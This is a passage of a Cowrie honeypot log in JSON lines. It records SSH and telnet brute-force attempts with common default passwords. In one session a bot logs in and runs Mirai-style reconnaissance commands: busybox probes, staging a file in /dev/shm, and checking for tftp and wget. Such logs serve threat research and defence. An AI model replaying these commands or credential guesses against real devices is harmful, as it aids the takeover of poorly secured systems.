our","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:53:06.652797Z","src_ip":"196.251.86.249","session":"b5862ddf6f47"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234qwer","message":"login attempt [user/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-26T10:53:08.279302Z","src_ip":"196.251.86.249","session":"b5862ddf6f47"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:53:09.793970Z","src_ip":"196.251.86.249","session":"b5862ddf6f47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":15022,"dst_ip":"1.2.3.4","dst_port":23,"session":"6b7871953918","protocol":"telnet","message":"New connection: 212.227.125.160:15022 (1.2.3.4:23) [session: 6b7871953918]","sensor":"my-vps","timestamp":"2025-08-26T10:54:06.693788Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"54321","message":"login attempt [admin/54321] failed","sensor":"my-vps","timestamp":"2025-08-26T10:54:07.442790Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T10:54:08.195037Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":51364,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3dd93ecdbe8","protocol":"ssh","message":"New connection: 196.251.86.249:51364 (1.2.3.4:22) [session: a3dd93ecdbe8]","sensor":"my-vps","timestamp":"2025-08-26T10:54:08.865484Z"}
{"eventid":"cowrie.login.success","username":"root","password":"zsun1188","message":"login attempt [root/zsun1188] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:54:08.951404Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:54:09.020781Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-26T10:54:09.258420Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-26T10:54:09.260478Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-26T10:54:09.261395Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-26T10:54:09.262607Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-26T10:54:09.263524Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-26T10:54:09.264174Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:54:09.386571Z","src_ip":"196.251.86.249","session":"a3dd93ecdbe8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:54:09.387269Z","src_ip":"196.251.86.249","session":"a3dd93ecdbe8"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox MSPTS","message":"CMD: cat /proc/mounts; /bin/busybox MSPTS","sensor":"my-vps","timestamp":"2025-08-26T10:54:09.503449Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox MSPTS","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox MSPTS","sensor":"my-vps","timestamp":"2025-08-26T10:54:09.751397Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox MSPTS","message":"CMD: tftp; wget; /bin/busybox MSPTS","sensor":"my-vps","timestamp":"2025-08-26T10:54:09.992001Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-26T10:54:10.270520Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-26T10:54:10.273335Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.input","input":"/bin/busybox MSPTS","message":"CMD: /bin/busybox MSPTS","sensor":"my-vps","timestamp":"2025-08-26T10:54:10.517730Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-26T10:54:10.519742Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-26T10:54:10.521259Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-26T10:54:10.522059Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7859b2666a32552ee1b04ffba8ad3b12b9c3ef5fc0056f1af7ce3148b16f258f","size":3550,"shasum":"7859b2666a32552ee1b04ffba8ad3b12b9c3ef5fc0056f1af7ce3148b16f258f","duplicate":false,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/7859b2666a32552ee1b04ffba8ad3b12b9c3ef5fc0056f1af7ce3148b16f258f after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:54:10.523573Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.session.closed","duration":3.835068702697754,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:54:10.528784Z","src_ip":"212.227.125.160","session":"6b7871953918"}
{"eventid":"cowrie.login.failed","username":"user","password":"123qwe","message":"login attempt [user/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T10:54:10.950650Z","src_ip":"196.251.86.249","session":"a3dd93ecdbe8"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:54:12.625830Z","src_ip":"196.251.86.249","session":"a3dd93ecdbe8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56122,"dst_ip":"1.2.3.4","dst_port":22,"session":"817574a54999","protocol":"ssh","message":"New connection: 217.72.205.35:56122 (1.2.3.4:22) [session: 817574a54999]","sensor":"my-vps","timestamp":"2025-08-26T10:55:02.196634Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:55:02.198444Z","src_ip":"217.72.205.35","session":"817574a54999"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":51198,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8049b1c0148","protocol":"ssh","message":"New connection: 196.251.86.249:51198 (1.2.3.4:22) [session: b8049b1c0148]","sensor":"my-vps","timestamp":"2025-08-26T10:55:10.787380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:55:11.223959Z","src_ip":"196.251.86.249","session":"b8049b1c0148"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:55:11.225224Z","src_ip":"196.251.86.249","session":"b8049b1c0148"}
{"eventid":"cowrie.login.failed","username":"user","password":"passpass","message":"login attempt [user/passpass] failed","sensor":"my-vps","timestamp":"2025-08-26T10:55:13.314982Z","src_ip":"196.251.86.249","session":"b8049b1c0148"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:55:14.829414Z","src_ip":"196.251.86.249","session":"b8049b1c0148"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":52858,"dst_ip":"1.2.3.4","dst_port":22,"session":"d434e369c361","protocol":"ssh","message":"New connection: 196.251.86.249:52858 (1.2.3.4:22) [session: d434e369c361]","sensor":"my-vps","timestamp":"2025-08-26T10:56:11.673345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:56:12.403734Z","src_ip":"196.251.86.249","session":"d434e369c361"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:56:12.404458Z","src_ip":"196.251.86.249","session":"d434e369c361"}
{"eventid":"cowrie.login.failed","username":"user","password":"pass123","message":"login attempt [user/pass123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:56:14.462324Z","src_ip":"196.251.86.249","session":"d434e369c361"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:56:16.265377Z","src_ip":"196.251.86.249","session":"d434e369c361"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":53672,"dst_ip":"1.2.3.4","dst_port":22,"session":"f95f9d8cb762","protocol":"ssh","message":"New connection: 196.251.86.249:53672 (1.2.3.4:22) [session: f95f9d8cb762]","sensor":"my-vps","timestamp":"2025-08-26T10:57:12.870680Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:57:13.585654Z","src_ip":"196.251.86.249","session":"f95f9d8cb762"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:57:13.586411Z","src_ip":"196.251.86.249","session":"f95f9d8cb762"}
{"eventid":"cowrie.login.failed","username":"user","password":"pass1234","message":"login attempt [user/pass1234] failed","sensor":"my-vps","timestamp":"2025-08-26T10:57:15.460212Z","src_ip":"196.251.86.249","session":"f95f9d8cb762"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:57:16.937227Z","src_ip":"196.251.86.249","session":"f95f9d8cb762"}
{"eventid":"cowrie.session.connect","src_ip":"198.235.24.86","src_port":60322,"dst_ip":"1.2.3.4","dst_port":22,"session":"50b64f1f95a4","protocol":"ssh","message":"New connection: 198.235.24.86:60322 (1.2.3.4:22) [session: 50b64f1f95a4]","sensor":"my-vps","timestamp":"2025-08-26T10:57:26.342524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-26T10:57:27.447068Z","src_ip":"198.235.24.86","session":"50b64f1f95a4"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-26T10:57:28.497180Z","src_ip":"198.235.24.86","session":"50b64f1f95a4"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:57:35.795358Z","src_ip":"198.235.24.86","session":"50b64f1f95a4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":53990,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc0f9435450d","protocol":"ssh","message":"New connection: 196.251.86.249:53990 (1.2.3.4:22) [session: cc0f9435450d]","sensor":"my-vps","timestamp":"2025-08-26T10:58:13.908596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:58:14.108396Z","src_ip":"196.251.86.249","session":"cc0f9435450d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:58:14.109068Z","src_ip":"196.251.86.249","session":"cc0f9435450d"}
{"eventid":"cowrie.login.failed","username":"user","password":"wasd","message":"login attempt [user/wasd] failed","sensor":"my-vps","timestamp":"2025-08-26T10:58:15.637954Z","src_ip":"196.251.86.249","session":"cc0f9435450d"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:58:17.243115Z","src_ip":"196.251.86.249","session":"cc0f9435450d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":54350,"dst_ip":"1.2.3.4","dst_port":22,"session":"ddf178b15c03","protocol":"ssh","message":"New connection: 196.251.86.249:54350 (1.2.3.4:22) [session: ddf178b15c03]","sensor":"my-vps","timestamp":"2025-08-26T10:59:13.862851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:59:14.549932Z","src_ip":"196.251.86.249","session":"ddf178b15c03"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:59:14.550647Z","src_ip":"196.251.86.249","session":"ddf178b15c03"}
{"eventid":"cowrie.login.failed","username":"user","password":"qwerty","message":"login attempt [user/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T10:59:16.836891Z","src_ip":"196.251.86.249","session":"ddf178b15c03"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:59:18.449312Z","src_ip":"196.251.86.249","session":"ddf178b15c03"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":54956,"dst_ip":"1.2.3.4","dst_port":22,"session":"10b51526f6f7","protocol":"ssh","message":"New connection: 196.251.86.249:54956 (1.2.3.4:22) [session: 10b51526f6f7]","sensor":"my-vps","timestamp":"2025-08-26T11:00:13.706464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:00:14.578687Z","src_ip":"196.251.86.249","session":"10b51526f6f7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","dif